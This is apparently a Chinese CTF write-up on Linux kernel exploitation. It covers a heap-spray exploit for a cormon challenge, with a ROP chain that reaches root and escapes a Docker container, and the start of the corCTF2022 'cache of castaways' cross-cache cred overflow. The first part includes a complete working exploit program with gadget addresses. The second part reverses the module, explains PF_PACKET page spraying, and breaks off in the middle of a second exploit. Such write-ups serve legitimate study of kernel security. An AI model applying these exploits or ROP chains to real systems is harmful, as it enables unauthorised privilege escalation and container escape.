另外实测 kmalloc-32 的 freelist 偏移为 16 字节,不会覆盖 next 指针。
喷射 seq_operations 利用 seq_operations->next 的低二字节覆盖 user_key_payload->datalen 实现 user_key_payload 越界读, user_key_payload->data 前 8 字节被覆盖为 seq_operations->show ,可以泄露内核基址。另外可以根据是否越界读判断该 user_key_payload 是否被 seq_operations 覆盖。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 struct seq_operations { void * (*start) (struct seq_file *m, loff_t *pos); void (*stop) (struct seq_file *m, void *v); void * (*next) (struct seq_file *m, void *v, loff_t *pos); int (*show) (struct seq_file *m, void *v); }; struct user_key_payload { struct rcu_head rcu ; unsigned short datalen; char data[0 ] __aligned(__alignof__(u64)); }; struct callback_head { struct callback_head *next ; void (*func)(struct callback_head *head); } __attribute__((aligned(sizeof (void *)))); #define rcu_head callback_head
之后释放不能越界读的 user_key_payload 并喷射 tty_file_private 填充产生的空闲 object 。之后再次越界读泄露 tty_file_private->tty 指向的 tty_struct ,我们定义这个地址为 target_object 。
释放 seq_operations ,喷射 0x20 大小的 poll_list 。现在UAF的堆块被user_key_payload和poll_list占领。在 poll_list 被释放前,释放劫持的 user_key_payload ,利用 setxattr 修改 poll_list 的 next 指针指向 target_object - 0x18,方便后续伪造pipe_buffer 。为了实现 setxattr 的喷射效果,setxattr 修改过的 object 通过申请 user_key_payload 劫持,确保下次 setxattr 修改的是另外的 object 。
打开 /dev/ptmx 时会分配 tty_file_private 并且该结构体的 tty 指针会指向 tty_struct 。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 int tty_alloc_file (struct file *file) { struct tty_file_private *priv ; priv = kmalloc(sizeof (*priv), GFP_KERNEL); if (!priv) return -ENOMEM; file->private_data = priv; return 0 ; } struct tty_file_private { struct tty_struct *tty ; struct file *file ; struct list_head list ; };
趁 poll_list 还没有释放,释放 tty_struct 并申请 pipe_buffer ,将 target_object(tty_struct) 替换为 pipe_buffer 。
1 2 3 4 5 6 7 struct pipe_buffer { struct page *page ; unsigned int offset, len; const struct pipe_buf_operations *ops ; unsigned int flags; unsigned long private; };
之后 poll_list 释放导致 target_object - 0x18 区域释放。我们可以申请一个 0x400 大小的 user_key_payload 劫持 target_object - 0x18 ,从而劫持 pipe_buffer->ops 实现控制流劫持。
docker逃逸
具体实现为修改 task_struct 的 fs 指向 init_fs 。首先用 find_task_by_vpid() 定位 Docker 容器任务,再用 switch_task_namespaces() 切换其命名空间,但这还不足以从容器中逃逸。由于在 Docker 容器中 setns() 默认被 seccomp 屏蔽,我们可以克隆 init_fs 结构,然后用 find_task_by_vpid() 定位当前任务,再用 gadget 手动安装新的 fs_struct。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 *rop++ = pop_rdi_ret; *rop++ = init_cred; *rop++ = commit_creds; *rop++ = pop_rdi_ret; *rop++ = getpid(); *rop++ = find_task_by_vpid; *rop++ = pop_rcx_ret; *rop++ = 0x6e0 ; *rop++ = add_rax_rcx_ret; *rop++ = pop_rbx_ret; *rop++ = init_fs; *rop++ = mov_mmrax_rbx_pop_rbx_ret; rop++;
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> 
#include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/sysinfo.h> #define PAGE_SIZE 0x1000 int randint (int min, int max) { return min + (rand() % (max - min)); } void bind_core (bool fixed, bool thread) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(fixed ? 0 : randint(1 , get_nprocs()), &cpu_set); if (thread) { pthread_setaffinity_np(pthread_self(), sizeof (cpu_set), &cpu_set); } else { sched_setaffinity(getpid(), sizeof (cpu_set), &cpu_set); } } void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' 
); } puts ("" ); } } bool is_kernel_text_addr (size_t addr) { return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF ; } bool is_dir_mapping_addr (size_t addr) { return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF ; } #define INVALID_KERNEL_OFFSET 0x1145141919810 const size_t kernel_addr_list[] = { 0xffffffff813275c0 , 0xffffffff812d4320 , 0xffffffff812d4340 , 0xffffffff812d4330 }; size_t kernel_offset_query (size_t kernel_text_leak) { if (!is_kernel_text_addr(kernel_text_leak)) { return INVALID_KERNEL_OFFSET; } for (int i = 0 ; i < sizeof (kernel_addr_list) / sizeof (kernel_addr_list[0 ]); i++) { if (!((kernel_text_leak ^ kernel_addr_list[i]) & 0xFFF ) && (kernel_text_leak - kernel_addr_list[i]) % 0x100000 == 0 ) { return kernel_text_leak - kernel_addr_list[i]; } } printf ("[-] unknown kernel addr: %#lx\n" , kernel_text_leak); return INVALID_KERNEL_OFFSET; } size_t search_kernel_offset (void *buf, int len) { size_t *search_buf = buf; for (int i = 0 ; i < len / 8 ; i++) { size_t kernel_offset = kernel_offset_query(search_buf[i]); if (kernel_offset != INVALID_KERNEL_OFFSET) { printf ("[+] kernel leak addr: %#lx\n" , search_buf[i]); printf ("[+] kernel offset: %#lx\n" , kernel_offset); return kernel_offset; } } return INVALID_KERNEL_OFFSET; } size_t user_cs, user_rflags, user_sp, user_ss;void save_status () { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts ("[*] status has been saved." 
); } typedef struct { int nfds, timer; } poll_args; struct poll_list { struct poll_list *next ; int len; struct pollfd entries []; }; pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;size_t poll_threads, poll_cnt;void *alloc_poll_list (void *args) { int nfds = ((poll_args *) args)->nfds; int timer = ((poll_args *) args)->timer; struct pollfd *pfds = calloc (nfds, sizeof (struct pollfd)); for (int i = 0 ; i < nfds; i++) { pfds[i].fd = open("/etc/passwd" , O_RDONLY); pfds[i].events = POLLERR; } bind_core(true , true ); pthread_mutex_lock(&mutex); poll_threads++; pthread_mutex_unlock(&mutex); poll(pfds, nfds, timer); bind_core(false , true ); pthread_mutex_lock(&mutex); poll_threads--; pthread_mutex_unlock(&mutex); } #define N_STACK_PPS 30 #define POLL_NUM 0x1000 pthread_t poll_tid[POLL_NUM];void create_poll_thread (size_t size, int timer) { poll_args *args = calloc (1 , sizeof (poll_args)); args->nfds = (size - (size + PAGE_SIZE - 1 ) / PAGE_SIZE * sizeof (struct poll_list)) / sizeof (struct pollfd) + N_STACK_PPS; args->timer = timer; pthread_create(&poll_tid[poll_cnt++], 0 , alloc_poll_list, args); } void wait_poll_start () { while (poll_threads != poll_cnt); } void join_poll_threads (void (*confuse)(void *), void *confuse_args) { for (int i = 0 ; i < poll_threads; i++) { pthread_join(poll_tid[i], NULL ); if (confuse != NULL ) { confuse(confuse_args); } } poll_cnt = poll_threads = 0 ; } struct callback_head { struct callback_head *next ; void (*func)(struct callback_head *head); } __attribute__((aligned(sizeof (void *)))); #define rcu_head callback_head #define __aligned(x) __attribute__((__aligned__(x))) typedef unsigned long long u64;struct user_key_payload { struct rcu_head rcu ; unsigned short datalen; char data[0 ] __aligned(__alignof__(u64)); }; #define KEY_NUM 199 int key_id[KEY_NUM];int key_alloc (int id, void *payload, int payload_len) { char description[0x10 ] = {}; sprintf (description, "%d" , id); return key_id[id] = syscall(__NR_add_key, "user" , 
description, payload, payload_len - sizeof (struct user_key_payload), KEY_SPEC_PROCESS_KEYRING); } int key_update (int id, void *payload, size_t plen) { return syscall(__NR_keyctl, KEYCTL_UPDATE, key_id[id], payload, plen); } int key_read (int id, void *bufer, size_t buflen) { return syscall(__NR_keyctl, KEYCTL_READ, key_id[id], bufer, buflen); } int key_revoke (int id) { return syscall(__NR_keyctl, KEYCTL_REVOKE, key_id[id], 0 , 0 , 0 ); } int key_unlink (int id) { return syscall(__NR_keyctl, KEYCTL_UNLINK, key_id[id], KEY_SPEC_PROCESS_KEYRING); } struct list_head { struct list_head *next , *prev ; }; struct tty_file_private { struct tty_struct *tty ; struct file *file ; struct list_head list ; }; struct page ;struct pipe_inode_info ;struct pipe_buf_operations ;struct pipe_bufer { struct page *page ; unsigned int offset, len; const struct pipe_buf_operations *ops ; unsigned int flags; unsigned long private; }; struct pipe_buf_operations { int (*confirm)(struct pipe_inode_info *, struct pipe_bufer *); void (*release)(struct pipe_inode_info *, struct pipe_bufer *); int (*try_steal)(struct pipe_inode_info *, struct pipe_bufer *); int (*get)(struct pipe_inode_info *, struct pipe_bufer *); }; void get_shell (void ) { char *args[] = {"/bin/bash" , "-i" , NULL }; execve(args[0 ], args, NULL ); } #define SEQ_NUM (2048 + 128) #define TTY_NUM 72 #define PIPE_NUM 1024 int cormon_fd;char buf[0x20000 ];void seq_confuse (void *args) { open("/proc/self/stat" , O_RDONLY); } size_t push_rsi_pop_rsp_ret = 0xFFFFFFFF817AD641 ;size_t pop_rdi_ret = 0xffffffff8116926d ;size_t init_cred = 0xFFFFFFFF8245A960 ;size_t commit_creds = 0xFFFFFFFF810EBA40 ;size_t pop_r14_pop_r15_ret = 0xffffffff81001615 ;size_t find_task_by_vpid = 0xFFFFFFFF810E4FC0 ;size_t init_fs = 0xFFFFFFFF82589740 ;size_t pop_rcx_ret = 0xffffffff8101f5fc ;size_t add_rax_rcx_ret = 0xffffffff8102396f ;size_t mov_mmrax_rbx_pop_rbx_ret = 0xffffffff817e1d6d ;size_t pop_rbx_ret = 0xffffffff811bce34 ;size_t swapgs_ret = 
0xffffffff81a05418 ;size_t iretq = 0xffffffff81c00f97 ;int main () { bind_core(true , false ); save_status(); signal(SIGSEGV, (void *) get_shell); cormon_fd = open("/proc_rw/cormon" , O_RDWR); if (cormon_fd < 0 ) { perror("[-] failed to open cormon." ); exit (-1 ); } size_t kernel_offset; int target_key; puts ("[*] Saturating kmalloc-32 partial slabs..." ); int seq_fd[SEQ_NUM]; for (int i = 0 ; i < SEQ_NUM; i++) { seq_fd[i] = open("/proc/self/stat" , O_RDONLY); if (seq_fd[i] < 0 ) { perror("[-] failed to open stat." ); exit (-1 ); } if (i == 2048 ) { puts ("[*] Spraying user keys in kmalloc-32..." ); for (int j = 0 ; j < KEY_NUM; j++) { setxattr("/tmp/exp" , "aaaaaa" , buf, 32 , XATTR_CREATE); key_alloc(j, buf, 32 ); if (j == 72 ) { bind_core(false , false ); puts ("[*] Creating poll threads..." ); for (int k = 0 ; k < 14 ; k++) { create_poll_thread( PAGE_SIZE + sizeof (struct poll_list) + sizeof (struct pollfd), 3000 ); } bind_core(true , false ); wait_poll_start(); } } puts ("[*] Corrupting poll_list next pointer..." ); write(cormon_fd, buf, PAGE_SIZE); puts ("[*] Triggering arbitrary free..." ); join_poll_threads(seq_confuse, NULL ); puts ("[*] Overwriting user key size / Spraying seq_operations structures..." ); } } puts ("[*] Leaking kernel pointer..." ); for (int i = 0 ; i < KEY_NUM; i++) { int len = key_read(i, buf, sizeof (buf)); kernel_offset = search_kernel_offset(buf, len); if (kernel_offset != INVALID_KERNEL_OFFSET) { qword_dump("dump leak memory" , buf, 0x1000 ); target_key = i; break ; } } if (kernel_offset == INVALID_KERNEL_OFFSET) { puts ("[-] failed to leak kernel offset,try again." 
); exit (-1 ); } push_rsi_pop_rsp_ret += kernel_offset; pop_rdi_ret += kernel_offset; init_cred += kernel_offset; commit_creds += kernel_offset; pop_r14_pop_r15_ret += kernel_offset; find_task_by_vpid += kernel_offset; init_fs += kernel_offset; pop_rcx_ret += kernel_offset; add_rax_rcx_ret += kernel_offset; mov_mmrax_rbx_pop_rbx_ret += kernel_offset; pop_rbx_ret += kernel_offset; swapgs_ret += kernel_offset; iretq += kernel_offset; puts ("[*] Freeing user keys..." ); for (int i = 0 ; i < KEY_NUM; i++) { if (i != target_key) { key_unlink(i); } } sleep(1 ); puts ("[*] Spraying tty_file_private / tty_struct structures..." ); int tty_fd[TTY_NUM]; for (int i = 0 ; i < TTY_NUM; i++) { tty_fd[i] = open("/dev/ptmx" , O_RDWR | O_NOCTTY); if (tty_fd[i] < 0 ) { perror("[-] failed to open ptmx" ); } } puts ("[*] Leaking heap pointer..." ); size_t target_object = -1 ; int len = key_read(target_key, buf, sizeof (buf)); qword_dump("dump leak memory" , buf, 0x1000 ); for (int i = 0 ; i < len; i += 8 ) { struct tty_file_private *head = (void *) &buf[i]; if (is_dir_mapping_addr((size_t ) head->tty) && !(((size_t ) head->tty) & 0xFF ) && head->list .next == head->list .prev && head->list .prev != NULL ) { qword_dump("leak tty_struct addr from tty_file_private" , &buf[i], sizeof (struct tty_file_private)); target_object = (size_t ) head->tty; printf ("[+] tty_struct addr: %p\n" , target_object); break ; } } if (target_object == -1 ) { puts ("[-] failed to leak tty_struct addr." ); exit (-1 ); } puts ("[*] Freeing seq_operation structures..." ); for (int i = 2048 ; i < SEQ_NUM; i++) { close(seq_fd[i]); } bind_core(false , false ); puts ("[*] Creating poll threads..." ); for (int i = 0 ; i < 192 ; i++) { create_poll_thread(sizeof (struct poll_list) + sizeof (struct pollfd), 3000 ); } bind_core(true , false ); wait_poll_start(); puts ("[*] Freeing corrupted key..." ); key_unlink(target_key); sleep(1 ); puts ("[*] Overwriting poll_list next pointer..." 
); char key[32 ] = {}; *(size_t *) &buf[0 ] = target_object - 0x18 ; for (int i = 0 ; i < KEY_NUM; i++) { setxattr("/tmp/exp" , "aaaaaa" , buf, 32 , XATTR_CREATE); key_alloc(i, key, 32 ); } puts ("[*] Freeing tty_struct structures..." ); for (int i = 0 ; i < TTY_NUM; i++) { close(tty_fd[i]); } sleep(1 ); int pipe_fd[PIPE_NUM][2 ]; puts ("[*] Spraying pipe_bufer structures..." ); for (int i = 0 ; i < PIPE_NUM; i++) { pipe(pipe_fd[i]); write(pipe_fd[i][1 ], "aaaaaa" , 6 ); } puts ("[*] Triggering arbitrary free..." ); join_poll_threads(NULL , NULL ); ((struct pipe_bufer *) buf)->ops = (void *) (target_object + 0x300 ); ((struct pipe_buf_operations *) &buf[0x300 ])->release = (void *) push_rsi_pop_rsp_ret; size_t *rop = (size_t *) buf; *rop++ = pop_r14_pop_r15_ret; rop++; rop++; *rop++ = pop_rdi_ret; *rop++ = init_cred; *rop++ = commit_creds; *rop++ = pop_rdi_ret; *rop++ = getpid(); *rop++ = find_task_by_vpid; *rop++ = pop_rcx_ret; *rop++ = 0x6e0 ; *rop++ = add_rax_rcx_ret; *rop++ = pop_rbx_ret; *rop++ = init_fs; *rop++ = mov_mmrax_rbx_pop_rbx_ret; rop++; *rop++ = swapgs_ret; *rop++ = iretq; *rop++ = (uint64_t ) get_shell; *rop++ = user_cs; *rop++ = user_rflags; *rop++ = user_sp; *rop++ = user_ss; puts ("[*] Spraying ROP chain..." ); for (int i = 0 ; i < 31 ; i++) { key_alloc(i, buf, 1024 ); } puts ("[*] Hijacking control flow..." ); for (int i = 0 ; i < PIPE_NUM; i++) { close(pipe_fd[i][0 ]); close(pipe_fd[i][1 ]); } sleep(5 ); return 0 ; }
多试几次还是可以成功的。
corCTF2022 cache of castaways 题目分析 保护机制
题目给了 kconfig 文件,开启了 SMAP、SMEP、KPTI、KASLR 及常用的保护机制,内核版本是 5.18.3,所以禁用了 msg_msg。
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/sh exec qemu-system-x86_64 \ -m 4096M \ -nographic \ -kernel bzImage \ -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \ -netdev user,id =net \ -device e1000, netdev=net \ -no-reboot \ -monitor /dev/null \ -cpu qemu64,+smep,+smap \ -initrd initramfs.cpio
逆向分析
在启动脚本里加载了一个名为 cache_of_castaway.ko 的 LKM,按惯例丢进 IDA,在模块初始化时注册了设备并创建了一个 kmem_cache,分配的 object 的 size 为 512,创建 flag 为 SLAB_ACCOUNT | SLAB_PANIC,同时开启了 CONFIG_MEMCG_KMEM=y,这意味着这是一个独立的 kmem_cache :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 __int64 init_module () { __int64 result; castaway_dev = 255 ; qword_8A8 = (__int64)"castaway" ; qword_8B0 = (__int64)&castaway_fops; _mutex_init(&castaway_lock, "&castaway_lock" , &_key_28999); if ( !(unsigned int )misc_register(&castaway_dev) && (castaway_arr = kmem_cache_alloc(kmalloc_caches[12 ], 3520LL )) != 0 && (castaway_cachep = kmem_cache_create("castaway_cache" , 0x200 LL, 1LL , 0x4040000 LL, 0LL )) != 0 ) { result = init_castaway_driver_cold(); } else { result = 0xFFFFFFFF LL; } return result; }
设备只定义了一个 ioctl,其中包含分配与编辑堆块的功能且都有锁,最多可以分配 400 个 object,没有释放功能:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 __int64 __fastcall castaway_ioctl (__int64 a1, int a2, __int64 a3) { __int64 v3; _QWORD *v5; unsigned __int64 v6[6 ]; v6[3 ] = __readgsqword(0x28 u); if ( a2 != 0xCAFEBABE ) { if ( copy_from_user(v6, a3, 24LL ) ) return -1LL ; mutex_lock(&castaway_lock); if ( a2 == 0xF00DBABE ) v3 = castaway_edit(v6[0 ], v6[1 ], v6[2 ]); else v3 = -1LL ; LABEL_5: mutex_unlock(&castaway_lock); return v3; } mutex_lock(&castaway_lock); v3 = castaway_ctr; if ( castaway_ctr <= 399 ) { ++castaway_ctr; v5 = (_QWORD *)(castaway_arr + 8 * v3); *v5 = kmem_cache_alloc(castaway_cachep, 0x400DC0 LL); if ( *(_QWORD *)(castaway_arr + 8 * v3) ) goto LABEL_5; } return ((__int64 (*)(void ))castaway_ioctl_cold)(); }
漏洞便存在于编辑堆块的 castaway_edit() 当中,在拷贝数据时会故意从 object + 6 的地方开始拷贝,从而存在一个 6 字节的溢出,这里因为是先拷贝到内核栈上再进行内核空间中的拷贝所以不会触发 hardened usercopy 的检查:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 __int64 __fastcall castaway_edit (unsigned __int64 a1, size_t a2, __int64 a3) { char src[512 ]; unsigned __int64 v6; v6 = __readgsqword(0x28 u); if ( a1 > 0x18F ) return castaway_edit_cold(); if ( !*(_QWORD *)(castaway_arr + 8 * a1) ) return castaway_edit_cold(); if ( a2 > 0x200 ) return castaway_edit_cold(); _check_object_size(src, a2, 0LL ); if ( copy_from_user(src, a3, a2) ) return castaway_edit_cold(); memcpy ((void *)(*(_QWORD *)(castaway_arr + 8 * a1) + 6LL ), src, a2); return a2; }
编辑堆块时我们应当向内核中传入如下结构:
1 2 3 4 5 struct request { int64_t index; size_t size; void *buf; };
利用思路 由于我们的漏洞对象位于独立的 kmem_cache 中,因此其不会与内核中的其他常用结构体的分配混用,我们无法直接通过 slub 层的堆喷 + 堆风水来溢出到其他结构体来进行下一步利用;同时由于 slub 并不会像 glibc 的ptmalloc2 那样在每个 object 开头都有个存储数据的 header,而是将 next 指针放在一个随机的位置,我们很难直接溢出到下一个 object 的 next 域,由于 hardened freelist 的存在就算我们能溢出到下一个相邻 object 的 next 域也没法构造出一个合法的指针;而在我们的 slub 页面相邻的页面上的数据对我们来说也是未知的,直接溢出的话我们并不知道能够溢出到什么页面上。
让我们把目光重新放到 slub allocator 上,当 freelist page 已经耗空且 partial 链表也为空时(或者 kmem_cache 刚刚创建后进行第一次分配时),其会向 buddy system 申请页面:
buddy system 的基本原理就是以 2 的 order 次幂张内存页作为分配粒度,相同 order 间空闲页面构成双向链表,当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半,其中一半挂回当前请求 order 链表,另一半返还给上层调用者;下图为以 order 2 为例的 buddy system 页面分配基本原理:
我们不难想到的是:从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的 ,若其中的一份被我们的 kmem_cache 取走,而另一份被用于分配其他内核结构体的 kmem_cache 取走,则我们便有可能溢出到其他的内核结构体上 ——这便是 **cross-cache overflow**。
具体的溢出对象也并不难想——6个字节刚好足够我们溢出到 cred 结构体的 uid 字段,完成提权,那么如何溢出到我们想要提权的进程的 cred 结构体呢?我们只需要先 fork() 堆喷 cred 耗尽 cred_jar 中 object,让其向 buddy system 请求新的页面即可,我们还需要先堆喷消耗 buddy system 中原有的页面,之后我们再分配 cred 和题目 object,两者便有较大概率相邻。
cred 的大小为 192,cred_jar 向 buddy system 单次请求的页面数量为 1,足够分配 21 个 cred,因此我们不需要堆喷太多 cred 便能耗尽 cred_jar,不过 fork() 在执行过程中会产生很多的“噪声”(即额外分配一些我们不需要的结构体,从而影响页布局),因此这里我们改用 clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND)。
使用 setsockopt() 进行页喷射的方法:当我们创建一个 protocol 为 PF_PACKET 的 socket 之后,先调用 setsockopt() 将 PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2,再调用 setsockopt() 提交一个 PACKET_TX_RING ,此时便存在如下调用链:
1 2 3 4 5 __sys_setsockopt() sock->ops->setsockopt() packet_setsockopt() packet_set_ring() alloc_pg_vec()
在 alloc_pg_vec() 中会创建一个 pgv 结构体,用以分配 tp_block_nr 份 $2^{order}$ 张内存页,其中 order 由 tp_block_size 决定:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 static struct pgv *alloc_pg_vec (struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec ; int i; pg_vec = kcalloc(block_nr, sizeof (struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely(!pg_vec)) goto out; for (i = 0 ; i < block_nr; i++) { pg_vec[i].buffer = alloc_one_pg_vec_page(order); if (unlikely(!pg_vec[i].buffer)) goto out_free_pgvec; } out: return pg_vec; out_free_pgvec: free_pg_vec(pg_vec, order, block_nr); pg_vec = NULL ; goto out; }
在 alloc_one_pg_vec_page() 中会直接调用 __get_free_pages() 向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求:
1 2 3 4 5 6 7 8 9 10 11 static char *alloc_one_pg_vec_page (unsigned long order) { char *buffer; gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP | __GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY; buffer = (char *) __get_free_pages(gfp_flags, order); if (buffer) return buffer; }
pgv 中的页面会在 socket 被关闭后释放,这也方便我们后续的页级堆风水,不过需要注意的是低权限用户无法使用该函数,但是我们可以通过开辟新的命名空间来绕过该限制。
这里需要注意的是我们提权的进程不应当和页喷射的进程在同一命名空间内 ,因为后者需要开辟新的命名空间,而我们应当在原本的命名空间完成提权,因此这里选择新开一个进程进行页喷射,并使用管道在主进程与喷射进程间通信。(如果你忘了这一步,就会得到一个 65534 的 uid 然后冥思苦想半天…)。
setsockopt() 也可以帮助我们完成页级堆风水 ,当我们耗尽 buddy system 中的 low order pages 后,我们再请求的页面便都是物理连续的,因此此时我们再进行 setsockopt() 便相当于获取到了一块近乎物理连续的内存 (为什么是“近乎连续”是因为大量的 setsockopt() 流程中同样会分配大量我们不需要的结构体,从而消耗 buddy system 的部分页面)。
本题环境中题目的 kmem_cache 单次会向 buddy system 请求一张内存页,而由于 buddy system 遵循 LIFO,因此我们可以:
先分配大量的单张内存页,耗尽 buddy 中的 low-order pages。
间隔一张内存页释放掉部分单张内存页,之后堆喷 cred,这样便有几率获取到我们释放的单张内存页。
释放掉之前的间隔内存页,调用漏洞函数分配堆块,这样便有几率获取到我们释放的间隔内存页。
利用模块中漏洞进行越界写,篡改 cred->uid ,完成提权。
我们的子进程需要轮询等待自己的 uid 变为 root,这里选择用一个新的管道在主进程与子进程间通信,当子进程从管道中读出1字节时便开始检查自己是否成功提权,若未提权则直接 sleep 即可。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <stdint.h> #include <string.h> #include <sched.h> #include <time.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #define PGV_CRED_START (PGV_PAGE_NUM / 2) #define CRED_SPRAY_NUM 514 #define VUL_OBJ_NUM 400 #define VUL_OBJ_SIZE 512 #define VUL_OBJ_PER_SLUB 8 #define VUL_OBJ_SLUB_NUM (VUL_OBJ_NUM / VUL_OBJ_PER_SLUB) struct castaway_request { int64_t index; size_t size; void *buf; }; int dev_fd;void err_exit (char *msg) { printf ("\033[31m\033[1m[x] Error: %s\033[0m\n" , msg); exit (EXIT_FAILURE); } void alloc (void ) { ioctl(dev_fd, 0xCAFEBABE ); } 
void edit (int64_t index, size_t size, void *buf) { struct castaway_request r = { .index = index, .size = size, .buf = buf }; ioctl(dev_fd, 0xF00DBABE , &r); } char child_pipe_buf[1 ];int check_root_pipe[2 ];char bin_sh_str[] = "/bin/sh" ;char *shell_args[] = {bin_sh_str, NULL };struct timespec timer = { .tv_sec = 100000000 , .tv_nsec = 0 , }; int waiting_for_root_fn (void *args) { __asm__ volatile ( " lea rax, [check_root_pipe]; " " mov edi, dword ptr [rax]; " " mov rsi, child_pipe_buf; " " mov edx, 1; " " xor eax, eax; " " syscall; " " mov eax, 102; " " syscall; " " cmp eax, 0; " " jne failed; " " lea rdi, [bin_sh_str]; " " lea rsi, [shell_args]; " " xor edx, edx; " " mov eax, 59; " " syscall; " "failed: " " lea rdi, [timer]; " " xor esi, esi; " " mov eax, 35; " " syscall; " ) ; return 0 ; } __attribute__((naked)) long simple_clone (int flags, int (*fn)(void *)) { __asm__ volatile ( 